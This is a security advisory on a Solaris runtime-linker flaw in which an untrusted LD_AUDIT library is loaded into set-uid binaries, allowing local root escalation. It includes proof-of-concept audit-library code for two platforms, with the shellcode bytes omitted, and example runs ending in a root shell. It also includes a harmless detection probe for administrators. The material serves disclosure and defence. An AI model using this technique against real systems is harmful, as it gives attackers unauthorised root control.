Solaris Runtime Linker Security Vulnerability


Solaris's runtime linker fails to check the value of an environment variable, allowing a local attacker to gain root privileges.


The information has been provided by Przemyslaw Frasunek.


Vulnerable Systems:
SPARC and x86 Platform:
 * Solaris 8 with patches 109147-31 through 109147-36
 * Solaris 9 with patches 112963-16 through 112963-19
 * Solaris 10

Immune Systems:
 * Solaris 7 is not affected by this issue.

The Solaris runtime linker, ld.so.1, on the affected releases listed above doesn't check the length of the LD_AUDIT environment variable when running set-uid or set-gid binaries. LD_AUDIT names a shared object that the linker loads into the process as an audit library, and the library's la_version() entry point is called by the linker before any of the program's own code runs. A local user can therefore point LD_AUDIT at a shared object of their own, run any set-uid root binary, and have arbitrary code execute with root privileges.

Proof of Concept Code:
Solaris 10 (AMD64):
/* dupa.c: audit library whose la_version() jumps into the shellcode */
static char sh[] = "";  /* placeholder: the shellcode bytes are not reproduced on this page */

int la_version() {
        void (*f)();
        f = (void*)sh;      /* treat the shellcode buffer as a function */
        f();                /* runs before main() with the set-uid binary's privileges */
        return 3;           /* audit interface version; never reached once the shell is spawned */
}

Example Run:
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Solaris 9 on SPARC:
/* dupa.c: the same audit library with SPARC shellcode */
char sh[] = "";  /* placeholder: the shellcode bytes are not reproduced on this page */
/* setuid() */   /* first part of the omitted shellcode: setuid(0) */
/* execve() */   /* second part of the omitted shellcode: execve() of a shell */

int la_version() {
        void (*f)();
        f = (void*)sh;      /* treat the shellcode buffer as a function */
        f();                /* runs before main() with the set-uid binary's privileges */
        return 3;           /* audit interface version; never reached once the shell is spawned */
}

Example Run:
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
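
Check for an administrator:
The following is an added example, not code from the advisory or from Przemyslaw Frasunek. It is a harmless audit library that uses the same la_version() entry point as the proof of concept above, but instead of shellcode it only reports the uids of the process it was loaded into, so it can be used to test whether a runtime linker honours an untrusted LD_AUDIT inside a set-uid process without running anything dangerous. The file name, the /tmp path and the use of ping as the set-uid test binary are assumptions.

```c
/*
 * ld_audit_probe.c: a harmless audit library for checking whether a runtime
 * linker honours LD_AUDIT inside set-uid processes. It carries no shellcode;
 * it only reports, on stderr, the uids of the process it was loaded into.
 *
 * Build (assumed path, not from the advisory):
 *     gcc -fPIC -shared -o /tmp/ld_audit_probe.so ld_audit_probe.c
 * Probe, as an unprivileged user, with any set-uid root binary (assumed: ping):
 *     LD_AUDIT=/tmp/ld_audit_probe.so /usr/sbin/ping 127.0.0.1
 * A hardened linker loads audit libraries for set-uid processes only from
 * trusted directories (Solaris: /usr/lib/secure), so nothing is printed.
 * An "[audit] ... euid=0" line from such a run means the linker ran our code
 * with root privileges, exactly the condition the advisory's exploit needs.
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <link.h>     /* rtld audit interface (la_* entry points) */
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

static int preinit_calls;   /* how often la_preinit fired; exposed for testing */

/* True when the process holds set-uid root privileges it did not start with:
 * the real uid differs from the effective uid and the effective uid is root. */
int in_setuid_root_process(uid_t ruid, uid_t euid)
{
    return ruid != euid && euid == 0;
}

int audit_preinit_calls(void)
{
    return preinit_calls;
}

/*
 * First audit entry point. The linker calls it before any code of the
 * program runs; the exploit on this page fires its shellcode from here.
 * Returning 0 rejects the library; echoing the offered version accepts it.
 */
unsigned int la_version(unsigned int version)
{
    if (version == 0)
        return 0;
    fprintf(stderr, "[audit] la_version(%u) in pid %ld: ruid=%ld euid=%ld%s\n",
            version, (long)getpid(), (long)getuid(), (long)geteuid(),
            in_setuid_root_process(getuid(), geteuid())
                ? " <-- loaded into a set-uid root process" : "");
    return version;
}

/* Called once all objects are loaded, just before the program's main(). */
void la_preinit(uintptr_t *cookie)
{
    (void)cookie;
    preinit_calls++;
    fprintf(stderr, "[audit] la_preinit: program is about to start\n");
}
```

Run the probe as an unprivileged user against a set-uid root binary. If no "[audit]" line appears, the linker refused the untrusted audit library for the secure process, which is the correct behaviour; if a line with euid=0 appears, the linker is executing user-supplied code with root privileges, and the exploit shown above will work. The la_version() and la_preinit() entry points exist with the same signatures in the glibc rtld-audit interface, so the same probe can be used on Linux systems.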

Vendor Status:
Sun has released an advisory (Sun Alert 101794) that addresses the issue. For more details see: http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1

Categories: UNIX